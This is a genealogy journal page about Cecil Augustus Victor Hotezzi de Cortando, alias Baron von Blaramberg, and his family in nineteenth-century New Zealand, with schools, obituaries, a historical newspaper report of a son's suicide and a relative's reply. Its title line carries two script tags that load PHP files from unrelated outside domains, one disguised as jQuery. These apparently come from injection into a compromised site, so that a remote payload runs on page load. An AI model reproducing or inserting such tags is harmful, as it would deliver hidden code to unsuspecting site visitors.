Cecil Augustus Victor Hotezzi De CORTANDO - Oldenburg Germany to Woodville NZ<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Cecil Augustus Victor Hotezzi De CORTANDO - Oldenburg Germany to Woodville NZ

Journal by ngairedith

I would like some info on Cecil Augustus de Cortando. He was also known as Baron von Blaramberg but changed that later to Cecil Augustus/C. A. Curtis

Cecil was born in 1843 in Oldenburg, Germany, the 9th son of Reginald Count Hotezzi de Cortando (Baron von Blaramberg, or Blaremberg) and Vittoria Alma Cortando.
Cecil arrived on the "Wild Duck" under the name Augustus Curtis as chief steward. After his certificate of discharge, dated 1 March 1867, he married Elizabeth Mantel on 10 April 1869 at the residence of Rev Fell.
* Elizabeth was born 17 Jan 1850 at Silver street, St Paul's Bedford, daughter of John Mantel, the hairdresser & Sarah Watford.
* Elizabeth attended Taita school in 1868 as did a brother, Walter Mantel. Her sister Agnes was a hairdresser/milliner. Some other known siblings were Gertrude, Laura and John.
* Cecil and Elizabeth VON BLARAMBERG were school teachers in Wellington, Wanganui and Palmerston North.
their known children
(can you help with these?)
* 1870 - 1896 John Reginaldo 'Reginald' de Cortando. Reginald committed suicide at the Club Hotel, Woodville
Star, 15 July 1896 A man who had given the name of A. J. Curtis, apparently a jockey, was found dead in a bedroom at the Club Hotel, with a bullet hole in the centre of his forehead and a six-chambered revolver by his side. on a sheet of paper was found written, "Please communicate with G. W. Mitchell, State school, Palmerston North. Kindly keep this as quiet as possible, on account of relatives. I am doing this because I am disgusted with life." There was no signature. The man who committed suicide to-day is named Reginald de Cortando. He is a brother-in-law of Mr G. W. Mitchell, Palmerston North
* ? - Walter Clarelli de Cortando (an infant)
* ? - Cecil de Cortando
* 1871 - Wilhelmene Sara Elise Hotezzi de Cortando
* Wilhelmina married George Wylie Mitchell in 1894 & had 6 known children
* 1877 - 1957 Margherita Paulina de Cortando
* Margherita married Herbert Henry D'Arcy (1866-1948) as his 2nd wife, in 1928
* ? - Feodorovna Hottezzi de Cortando
* Feodorovna married William Strode Penny in 1901
* 1886 - 1916 Claude Douglas (registered as Blaramberg)
Claude dropped the 'von' when he went to war. He served as Private 10304, Wellington Infantry Regiment, 12th Reinforcements (2nd Draft), J Company, NZEF. His parents are listed as Mr Cecil and Mrs. Elizabeth Hotezzi de Cortando von Blaramberg, of 18, Amesbury St., Palmerston North. Claude was killed in action aged 33 in Somme, France on 10 Dec 1916
* 1886 - 1962 Herman Elima (registered as Blaramberg)

Cecil von Blaramberg, (under the name C. A CURTIS), was the principal of a private school, Te Aro Grammer School, in Wellington from 1870 until about 1880. He was later the headmaster of two state schools - Matarawa, near Wanganui from about 1880 to 1889 and Terrace End, in Palmerston North from 1889 to 1893.
Elizabeth von Blaramberg (under her maiden name of Elizabeth Mantel), was Assistant Mistress at the TAITA SCHOOL from about 1868 to 1870. She was also a teacher of music and art to private pupils at Matarawa. However she is best remembered as the Principal of the Carow Ladies College, also known as the Carow Girls Collegiate School, Palmerston North, which operated from 1891 until about 1901. This school was a large two-storey building in Carow Street providing accommodation for boarding pupils as well as serving as the von Blaramberg family residence.
Cecil assisted his wife at this school.

After the closure of the Carow Collegiate School and the sale of the Carow Street property (probably as a result of financial difficulties), Cecil and Elizabeth lived in a succession of small rented houses in Palmerston North.
They continued to operate a small school from each of these houses until about the time of World War One.

Cecil died on 27 Aug 1921 and is buried in the Old Gorge Cemetery in Woodville, next to a son, Regionald de Cortando who was born in NZ in 1871 and shot himself in the Club Hotel in Woodville in 1896 aged 25.

Manawatu Standard, 24 Aug 1921
A very old resident of Palmerston North, in the person of Cecil Augustus Victor Hotezzi de Cortando, Baron von Blaremberg, died to-day at his residence, 18 Amesbury street. Mr Blaramberg, as he was familiarly known, had resided in this country for 53 years and formerly conducted a private school. The late gentleman, who was 78 years of age, had been in indifferent health for many years and his death brought a happy release from long suffering. He leaves a widow and two surviving sons to mourn their loss
Auckland Star, 30 Aug 1921
Cecil Augustus Victor Hotezzi de Cortando, Baron von Blaremberg, who died at Palmerston North at the age of 78 years, was well known in Wellington over forty years ago. The deceased was known as Mr Blaremberg and conducted a large private boarding school in Ingestre Street. He was one of the first headmasters of the Terrace End School in which position he succeeded the present Minister of Lands, Hon D. H. Duthrie.
Elizabeth von Blaramberg died 19 Aug 1938 aged 88
Manawatu Standard, 31 Aug 1928
- At Wanganui, on August 29 1938, Elizabeth, widow of the late Baron Von Blaramberg; aged 88. Privately interred yesterday
* Elizabeth's last address was 8 Tregarth street. She is buried as Elizabeth M. Blaramberg at Aramoho cemetery

UPDATE Thank you to Rob for this message ..
Subject: Von Blaramberg
To: ngairedith
From: robnz
Date: 2019-04-17 00:59:21
hi, my name is Rob. I am related to the Blarambergs, my mum was one. Cecil Augusta Victor was my grandfather, but I never knew him. He died 8 years after my mum was born. There is one surviving Blaramberg living, Cecil 'Ray' von Blaramberg, he just turned 95 last Sunday, living in Tauranga. I have just done the MyHeritage DNA. Cant find any results for Blaramberg

Cecil & Reginaldo de Cortando
Father & Son at Old Gorge Cemetery, Woodville
photo taken by Marijke Bullians 7 Jan 2016

by ngairedith Profile | Research | Contact | Subscribe | Block this user
on 2008-12-26 16:13:37

ngairedith has been a Family Tree Circles member since Feb 2008.

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by HannahC on 2012-06-14 03:28:58

Cecil snr arrived on the Wild Duck under the name Augustus Curtis as chief steward. certificate of discharge dated 1 March 1867.he married Elizabeth on 10 April 1869 at the residence of Rev Fell. Elizabeth was born 17 January 1850,Silver street, St Paul's, Bedford. She began at the Taita school in 1868. She was the daughter of John Mantell, hairdresser, bc1816 and had married Sarah Watford bc 1819. Her brother Walter was at the Taita school, her sister Agnes was a hairdresser/milliner. She also had sisters Gertrude, Laura and another brother John. Agnes retired to Lyall bay Wellington. Cecil & Elizabeth had John Reginaldo,Walter Clarelli(died infant), cecil, wilhelmina(Mitchell), Margherita(darcy), Feodorovna(Strode-Penny),Claude, Hermann. Elizabeth lived her later years with Rita D'arcy in Hamilton.Herman and Claude and Herman were the only children born and registered with the Blaramberg name.

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